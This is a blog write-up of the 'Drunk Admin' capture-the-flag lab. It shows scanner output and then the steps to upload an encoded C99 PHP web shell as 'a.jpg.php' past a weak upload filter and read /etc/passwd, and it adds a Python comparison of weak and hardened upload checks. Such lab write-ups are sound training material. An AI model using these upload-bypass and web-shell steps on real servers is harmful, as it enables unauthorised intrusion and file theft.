Thursday, January 9, 2014

Drunk Admin Web Hacking Challenge - information gathering + install a backdoor shell

netdiscover

Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:3c:21:4a    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.104  08:00:27:63:94:10    01    060   CADMUS COMPUTER SYSTEMS

root@kali:~# unicornscan -mT 192.168.56.104
TCP open                 ssh[   22]        from 192.168.56.104  ttl 64
Main [Error   chld.c:53] am i missing children?, oh well

root@kali:~# nmap 192.168.56.104 -pT0-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:04 CET
Nmap scan report for 192.168.56.104
Host is up (0.00039s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8880/tcp open  cddbp-alt
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)

root@kali:~# nmap -sS -sV -O 192.168.56.104 -pT22,8880

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:10 CET
Nmap scan report for 192.168.56.104
Host is up (0.00037s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
8880/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.26 - 2.6.35, Linux 2.6.32
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.104 -port 8880
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        8880
+ Start Time:         2014-01-08 17:13:50 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze8
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie trypios created without the httponly flag
+ Server leaks inodes via ETags, header found with file /bBqXOGa0.eml, inode: 0x723b2, size: 0x33, mtime: 0x4ba515bf8ec40;4bcb127742900
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /info/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2014-01-08 17:14:02 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.104:8880/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Wed Jan  8 17:15:16 2014
URL_BASE: http://192.168.56.104:8880/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.104:8880/ ----
+ http://192.168.56.104:8880/cgi-bin/ (CODE:403|SIZE:292)
...
+ http://192.168.56.104:8880/image (CODE:200|SIZE:1392)
...
+ http://192.168.56.104:8880/info (CODE:200|SIZE:1600)
...
+ http://192.168.56.104:8880/upload (CODE:200|SIZE:57)
...
-----------------
DOWNLOADED: 13776 - FOUND: 23

http://192.168.56.104:8880/

View source:

<a href="myphp.php?id=102">PHP</a>

http://192.168.56.104:8880/myphp.php?id=102

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

...

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C1000

Try harder, you might find something here. Or not? Who knows.

http://192.168.56.104:8880/myphp.php?id=101

Linux drunkadm 2.6.32-5-686

This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1,
This server is protected with the Suhosin Patch 0.9.9.1

http://192.168.56.104:8880/myphp.php?id=108
Server Root     /etc/apache2

DOCUMENT_ROOT     /var/www
X-Powered-By     PHP/5.3.3-7+squeeze8
Set-Cookie     trypios=nop; expires=Wed, 08-Jan-2014 17:28:43 GMT

http://192.168.56.104:8880/myphp.php?id=116

APACHE_RUN_USER     www-data
APACHE_LOG_DIR     /var/log/apache2

http://192.168.56.104:8880/myphp.php?id=132

PHP Variables

http://192.168.56.104:8880/upload

upload a jpg


Live HTTP Headers:

Set-Cookie: trypios=394659692a460258b45a99f1424ea357; expires=Wed, 08-Jan-2014 18:42:49 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=394659692a460258b45a99f1424ea357

source:

<img src="images/394659692a460258b45a99f1424ea357.jpg" >

http://192.168.56.104:8880/images/394659692a460258b45a99f1424ea357.jpg

Cookie: trypios=uploader

--
php encoder here:
http://xploitaday.komodin.org/tools/php-encoder/

download  c99_preg_entropy.php

cp c99_preg_entropy.php a.jpg.php

http://192.168.56.104:8880/upload  

a.jpg.php

Set-Cookie: trypios=922def33ac603be53b99c558f73c4db7; expires=Wed, 08-Jan-2014 18:58:28 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=922def33ac603be53b99c558f73c4db7

http://192.168.56.104:8880/images/922def33ac603be53b99c558f73c4db7.php

I got a C99 php shell on the system.
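The upload handler evidently keeps whatever final extension the client sent, which is why a.jpg.php lands in images/ as a runnable .php file. The block below is an added illustration written for this writeup, not the challenge's own source: the weak check is an assumption about how the handler behaves, and JPEG_MAGIC, weak_store_name, hardened_store_name and handle_upload are constructed names.

```python
# Constructed example: assumed weak upload check beside a hardened one.
import os
import secrets
from typing import Optional

JPEG_MAGIC = b"\xff\xd8\xff"        # SOI marker plus the first segment marker byte
ALLOWED_EXT = {"jpg", "jpeg"}


def weak_store_name(client_name: str) -> Optional[str]:
    """Assumed weak check: accept any name containing 'jpg' and keep the
    client's final extension, so 'a.jpg.php' is stored as <token>.php and
    Apache executes it when fetched from /images/."""
    if "jpg" not in client_name.lower():
        return None
    ext = client_name.rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"


def hardened_store_name(client_name: str, data: bytes) -> Optional[str]:
    """Allow-list the extension, require JPEG magic bytes, and build the
    stored name from a fresh random token only."""
    base = os.path.basename(client_name)          # drop any path component
    parts = base.lower().split(".")
    # exactly one extension: Apache's mod_mime looks at every dotted suffix,
    # so a name like 'a.php.jpg' is not trusted either
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_EXT:
        return None
    if not data.startswith(JPEG_MAGIC):
        return None                               # PHP text renamed to .jpg
    return f"{secrets.token_hex(16)}.jpg"


def handle_upload(client_name: str, data: bytes, images_dir: str) -> Optional[str]:
    """Store a validated upload under images_dir and return the name the
    gallery page should reference (what the trypios cookie would carry)."""
    stored = hardened_store_name(client_name, data)
    if stored is None:
        return None
    with open(os.path.join(images_dir, stored), "wb") as fh:
        fh.write(data)
    return stored


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        print(handle_upload("a.jpg.php", b"\xff\xd8\xff\xe0JFIF", d))  # None
        print(handle_upload("cat.jpg", b"\xff\xd8\xff\xe0JFIF", d))    # <token>.jpg
```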

get /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/false
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
mysql:x:104:107:MySQL Server,,,:/var/lib/mysql:/bin/false


ls -al /home/bob

total 28
drwxr-xr-x 4 bob  bob  4096 Mar  6  2012 .
drwxr-xr-x 3 root root 4096 Mar  3  2012 ..
-rw-r--r-- 1 bob  bob   220 Mar  3  2012 .bash_logout
-rw-r--r-- 1 bob  bob  3184 Mar  3  2012 .bashrc
-rw-r--r-- 1 bob  bob   675 Mar  3  2012 .profile
drwxr-xr-x 2 root root 4096 Mar  6  2012 Documents
drwxr-xr-x 3 bob  bob  4096 Mar  6  2012 public_html

http://192.168.56.104:8880/~bob/

http://192.168.56.104:8880/~bob/encrypt.php

I didn't find any privilege escalation bug on this system...

Hints from here: http://www.sec-track.com/solucionario-del-reto-security-challenge-ctf-web-por-nonroot-ganador-del-reto
